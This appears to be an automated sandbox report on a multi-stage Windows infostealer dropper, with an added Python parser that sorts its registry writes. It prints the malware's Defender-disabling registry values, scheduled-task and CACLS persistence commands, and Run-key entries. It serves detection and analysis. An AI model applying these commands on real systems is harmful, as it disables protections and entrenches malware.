Analysis Overview
SHA256
395f9dcf0d0f6d92c7d1518f2744231547b8dadf08cee577ea9c3022b63c95b1
Threat Level: Known bad
The file 395f9dcf0d0f6d92c7d1518f2744231547b8dadf08cee577ea9c3022b63c95b1 was found to be: Known bad.
Malicious Activity Summary
Aurora
RedLine payload
Amadey
Modifies Windows Defender Real-time Protection settings
RedLine
Downloads MZ/PE file
Blocklisted process makes network request
Executes dropped EXE
Reads user/profile data of web browsers
Loads dropped DLL
Windows security modification
Looks up external IP address via web service
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks whether UAC is enabled
Adds Run key to start application
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Program crash
Enumerates physical storage devices
Detects Pyinstaller
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
Modifies Internet Explorer settings
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Creates scheduled task(s)
Gathers network information
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-02-25 00:56
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-02-25 00:56
Reported
2023-02-25 00:59
Platform
win10-20230220-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Amadey
Aurora
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mzD76SI.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mzD76SI.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mzD76SI.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iMJ64Qj.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iMJ64Qj.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iMJ64Qj.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iMJ64Qj.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iMJ64Qj.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mzD76SI.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mzD76SI.exe | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(36 matches in total; the report records no description, indicator, process or target for any of them)
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000283001\AdobeNulled.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000283001\AdobeNulled.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000283001\AdobeNulled.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000283001\AdobeNulled.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000283001\AdobeNulled.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000283001\AdobeNulled.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000283001\AdobeNulled.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iMJ64Qj.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mzD76SI.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mzD76SI.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\395f9dcf0d0f6d92c7d1518f2744231547b8dadf08cee577ea9c3022b63c95b1.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sGf94Oe29.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sAl36tz78.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sAl36tz78.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows\CurrentVersion\Run\prima.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020051\\prima.exe" | C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows\CurrentVersion\Run\Hedtgoupb.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Hedtgoupb.exe\"" | C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\395f9dcf0d0f6d92c7d1518f2744231547b8dadf08cee577ea9c3022b63c95b1.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sae82ET33.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sae82ET33.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sGf94Oe29.exe | N/A |
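The two Defender tables and the Run key table above record the registry writes as the sandbox observed them, not whether they took effect: a host with Tamper Protection turned on ignores these Real-Time Protection policy writes, and the Features\TamperProtection value is itself what Tamper Protection guards, so the attempt rather than the outcome is the detection signal. The RunOnce values named wextract_cleanupN are housekeeping written by the Windows IExpress self-extractor (wextract), which also creates the IXP00N.TMP directories; at next logon they delete the temp folder and relaunch nothing, so the signature fires on them but the persistence that matters is the two HKCU Run values for prima.exe and Hedtgoupb.exe. The Python below is an added example, not tooling from the sandbox or code from the sample: it parses rows in this report's table layout and sorts the writes into those three cases. The sample rows are constructed copies of rows from the tables above.

```python
import re
from collections import defaultdict

# Constructed sample: rows copied from the signature tables above, in the
# report's own "| Description | Indicator | Process | Target |" layout.
SAMPLE_ROWS = r'''
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mzD76SI.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iMJ64Qj.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mzD76SI.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sGf94Oe29.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows\CurrentVersion\Run\Hedtgoupb.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Hedtgoupb.exe\"" | C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sae82ET33.exe | N/A |
'''

ROW_RE = re.compile(r'^\|\s*(.*?)\s*\|\s*(.*?)\s*\|\s*(.*?)\s*\|\s*(.*?)\s*\|$')
# The sandbox prints a value write as  <key>\<value name> = "<data>"
SET_RE = re.compile(r'^(?P<key>.+)\\(?P<name>[^\\]+?) = "(?P<data>.*)"$')
DEFENDER_KEY = re.compile(r'\\Microsoft\\Windows Defender\\', re.I)
AUTORUN_KEY = re.compile(r'\\CurrentVersion\\Run(Once)?$', re.I)
IEXPRESS_NAME = re.compile(r'^wextract_cleanup\d+$', re.I)


def parse_rows(text):
    """Turn the report's table rows into dicts; header rows are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m or m.group(1) == 'Description':
            continue
        desc, indicator, process, _target = m.groups()
        key, name, data = indicator, None, None
        if desc.startswith('Set value'):
            s = SET_RE.match(indicator)
            if s:
                key, name, data = s.group('key'), s.group('name'), s.group('data')
        rows.append({'desc': desc, 'key': key, 'name': name, 'data': data, 'process': process})
    return rows


def classify(row):
    """Label one registry write; None when the row alone proves nothing."""
    key, name, data = row['key'], row['name'], row['data']
    if name is None:
        return None  # a bare "Key created" row carries no value to judge
    if DEFENDER_KEY.search(key):
        # Policies\...\Real-Time Protection\Disable* = 1 switches a component off;
        # Features\TamperProtection = 0 tries to switch off the guard on those settings.
        if (name.lower().startswith('disable') and data == '1') or \
           (name.lower() == 'tamperprotection' and data == '0'):
            return 'defender_tamper'
    if AUTORUN_KEY.search(key):
        if IEXPRESS_NAME.match(name) and 'advpack.dll,DelNodeRunDLL32' in data:
            return 'iexpress_cleanup'  # self-extractor housekeeping: deletes IXP00N.TMP
        return 'autorun'
    return None


def summarize(text):
    """{label: {process: [value names]}} over every parsable row."""
    out = defaultdict(lambda: defaultdict(list))
    for row in parse_rows(text):
        label = classify(row)
        if label:
            out[label][row['process']].append(row['name'])
    return {label: dict(by_proc) for label, by_proc in out.items()}


if __name__ == '__main__':
    for label, by_proc in summarize(SAMPLE_ROWS).items():
        for proc, names in by_proc.items():
            print(f'{label:17} {proc}  ->  {", ".join(names)}')
```

Run against the full report, the same parser groups every Defender write under the two IXP00N.TMP droppers, files all five wextract_cleanup entries as self-extractor cleanup, and leaves exactly the prima.exe and Hedtgoupb.exe Run values as autoruns.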
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\_MEI38922\AASIapp.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ifconfig.me | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000283001\AdobeNulled.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4308 set thread context of 4504 | N/A | C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(4 matches in total; the report records no description, indicator, process or target for any of them)
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\rundll32.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Users\Admin\AppData\Local\Temp\_MEI38922\AASIapp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\AASIapp.exe = "11001" | C:\Users\Admin\AppData\Local\Temp\_MEI38922\AASIapp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Users\Admin\AppData\Local\Temp\_MEI38922\AASIapp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Users\Admin\AppData\Local\Temp\_MEI38922\AASIapp.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iMJ64Qj.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\kPe14na.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mzD76SI.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\niG10yv56.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\ejy69Rn37.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI38922\AASIapp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI38922\AASIapp.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\395f9dcf0d0f6d92c7d1518f2744231547b8dadf08cee577ea9c3022b63c95b1.exe
"C:\Users\Admin\AppData\Local\Temp\395f9dcf0d0f6d92c7d1518f2744231547b8dadf08cee577ea9c3022b63c95b1.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sae82ET33.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sae82ET33.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sGf94Oe29.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sGf94Oe29.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sAl36tz78.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sAl36tz78.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iMJ64Qj.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iMJ64Qj.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\kPe14na.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\kPe14na.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mzD76SI.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mzD76SI.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\niG10yv56.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\niG10yv56.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rtz28ED46.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rtz28ED46.exe
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
"C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "Admin:N"&&CACLS "mnolyk.exe" /P "Admin:R" /E&&echo Y|CACLS "..\4f9dd6f8a7" /P "Admin:N"&&CACLS "..\4f9dd6f8a7" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "mnolyk.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "mnolyk.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\4f9dd6f8a7" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\4f9dd6f8a7" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe
"C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe"
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\ejy69Rn37.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\ejy69Rn37.exe
C:\Users\Admin\AppData\Local\Temp\1000021001\lebro.exe
"C:\Users\Admin\AppData\Local\Temp\1000021001\lebro.exe"
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
"C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\9e0894bcc4" /P "Admin:N"&&CACLS "..\9e0894bcc4" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "nbveek.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "nbveek.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\9e0894bcc4" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\9e0894bcc4" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\1000279001\bin.exe
"C:\Users\Admin\AppData\Local\Temp\1000279001\bin.exe"
C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe
"C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe"
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic os get Caption
C:\Users\Admin\AppData\Local\Temp\1000283001\AdobeNulled.exe
"C:\Users\Admin\AppData\Local\Temp\1000283001\AdobeNulled.exe"
C:\Users\Admin\AppData\Local\Temp\1000283001\AdobeNulled.exe
"C:\Users\Admin\AppData\Local\Temp\1000283001\AdobeNulled.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
